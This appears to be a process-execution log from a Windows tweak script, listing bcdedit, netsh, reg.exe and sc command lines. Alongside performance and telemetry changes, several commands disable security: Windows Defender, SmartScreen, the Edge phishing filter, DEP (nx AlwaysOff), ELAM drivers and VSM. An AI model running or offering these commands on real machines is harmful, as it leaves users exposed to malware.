"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4660 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5796 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\timeout.exe

timeout /t 2

C:\Windows\system32\fsutil.exe

fsutil behavior query memoryusage

C:\Windows\system32\fsutil.exe

fsutil behavior set memoryusage 2

C:\Windows\system32\bcdedit.exe

bcdedit /set increaseuserva 8000

C:\Windows\system32\ipconfig.exe

ipconfig /release

C:\Windows\system32\ipconfig.exe

ipconfig /renew

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

C:\Windows\system32\netsh.exe

netsh winsock reset

C:\Windows\system32\netsh.exe

netsh int tcp set global chimney=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global autotuninglevel=normal

C:\Windows\system32\netsh.exe

netsh int tcp set supplemental

C:\Windows\system32\netsh.exe

netsh int tcp set global dca=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global netdma=enabled

C:\Windows\system32\netsh.exe

netsh int tcp set global congestionprovider=ctcp

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="StopThrottling" dir=in

C:\Windows\system32\bcdedit.exe

bcdedit /set allowedinmemorysettings 0

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set debug No

C:\Windows\system32\bcdedit.exe

bcdedit /set isolatedcontext No

C:\Windows\system32\bcdedit.exe

bcdedit /set pae ForceEnable

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy Legacy

C:\Windows\system32\bcdedit.exe

bcdedit /set usefirmwarepcisettings No

C:\Windows\system32\bcdedit.exe

bcdedit /set sos Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set x2apicpolicy Enable

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set usephysicaldestination No

C:\Windows\system32\bcdedit.exe

bcdedit /set ems No

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set configaccesspolicy Default

C:\Windows\system32\bcdedit.exe

bcdedit /set linearaddress57 optin

C:\Windows\system32\bcdedit.exe

bcdedit /set noumex Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set bootems No

C:\Windows\system32\bcdedit.exe

bcdedit /set graphicsmodedisabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set extendedinput Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set highestmode Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set uselegacyapicmode No

C:\Windows\system32\bcdedit.exe

bcdedit /set onecpu No

C:\Windows\system32\bcdedit.exe

bcdedit /set halbreakpoint No

C:\Windows\system32\bcdedit.exe

bcdedit /set forcelegacyplatform No

C:\Windows\system32\bcdedit.exe

bcdedit /set allowedinmemorysettings 0

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue useplatformclock

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set debug No

C:\Windows\system32\bcdedit.exe

bcdedit /set isolatedcontext No

C:\Windows\system32\bcdedit.exe

bcdedit /set pae ForceEnable

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy Legacy

C:\Windows\system32\bcdedit.exe

bcdedit /set usefirmwarepcisettings No

C:\Windows\system32\bcdedit.exe

bcdedit /set sos Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set x2apicpolicy Enable

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set usephysicaldestination No

C:\Windows\system32\bcdedit.exe

bcdedit /set ems No

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set configaccesspolicy Default

C:\Windows\system32\bcdedit.exe

bcdedit /set linearaddress57 optin

C:\Windows\system32\bcdedit.exe

bcdedit /set noumex Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set bootems No

C:\Windows\system32\bcdedit.exe

bcdedit /set graphicsmodedisabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set extendedinput Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set highestmode Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set uselegacyapicmode No

C:\Windows\system32\bcdedit.exe

bcdedit /set onecpu No

C:\Windows\system32\bcdedit.exe

bcdedit /set halbreakpoint No

C:\Windows\system32\bcdedit.exe

bcdedit /set forcelegacyplatform No

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformclock no

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set disableelamdrivers Yes

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set firstmegabytepolicy UseAll

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /set perfmem 0

C:\Windows\system32\bcdedit.exe

bcdedit /set configflags 0

C:\Windows\system32\bcdedit.exe

bcdedit /set tscsyncpolicy Enhanced

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set nx AlwaysOff

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set vsmlaunchtype Off

C:\Windows\system32\bcdedit.exe

bcdedit /set forcefipscrypto No

C:\Windows\system32\bcdedit.exe

bcdedit /timeout 2

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformclock no

C:\Windows\system32\bcdedit.exe

bcdedit /set disabledynamictick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set useplatformtick yes

C:\Windows\system32\bcdedit.exe

bcdedit /set nx optout

C:\Windows\system32\bcdedit.exe

bcdedit /set bootux disabled

C:\Windows\system32\bcdedit.exe

bcdedit /set bootmenupolicy standard

C:\Windows\system32\bcdedit.exe

bcdedit /set hypervisorlaunchtype off

C:\Windows\system32\bcdedit.exe

bcdedit /set tpmbootentropy ForceDisable

C:\Windows\system32\bcdedit.exe

bcdedit /set quietboot yes

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f

C:\Windows\system32\sc.exe

sc stop dmwappushservice

C:\Windows\system32\net.exe

net stop dmwappushservice

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop dmwappushservice

C:\Windows\system32\sc.exe

sc config dmwappushservice start= disabled

C:\Windows\system32\net.exe

net stop diagnosticshub.standardcollector.service

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop diagnosticshub.standardcollector.service

C:\Windows\system32\sc.exe

sc config diagnosticshub.standardcollector.service start= disabled

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Input\TIPC" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\System" /v "AllowExperimentation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Bluetooth" /v "AllowAdvertising" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Messaging" /v "AllowMessageSync" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Biometrics" /v "Enabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\PushNotifications" /v "ToastEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Control Panel\International\User Profile" /v "HttpAcceptLanguageOptOut" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{C1D23ACC-752B-43E5-8448-8D0E519CD6D6}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSyncProviderNotifications" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2297E4E2-5DBE-466D-A12B-0F8286F0D9CA}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E5323777-F976-4f5b-9B55-B94699C46E44}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{2EEF81BE-33FA-4800-9670-1CD474972C3F}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{52079E78-A92B-413F-B213-E8FE35712E72}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{7D7E8402-7C54-4821-A34E-AEEFD62DED93}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{D89823BA-7180-4B81-B50C-7E471E6121A3}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{8BC668CF-7728-45BD-93F8-CF2B3B41D7AB}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{9231CB4C-BF57-4AF3-8C55-FDA7BFCC04C5}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{E390DF20-07DF-446D-B962-F5C953062741}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{992AFA70-6F47-4148-B3E9-3003349C1548}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\DiagTrack" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\dmwappushservice" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SYSTEM\ControlSet001\Control\WMI\Autologger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\WMDRM" /v "DisableOnline" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\{A8804298-2D5F-42E3-9531-9C8C39EB29CE}" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\DeviceAccess\Global\LooselyCoupled" /v "Value" /t REG_SZ /d "Deny" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CredUI" /v "DisablePasswordReveal" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "DoNotTrack" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main" /v "OptimizeWindowsSearchResultsForScreenReaders" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead" /v "FPEnabled" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\User\Default\SearchScopes" /v "ShowSearchSuggestionsGlobal" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\current\device\Browser" /v "AllowAddressBarDropdown" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy" /v "EnableEncryptedMediaExtensions" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

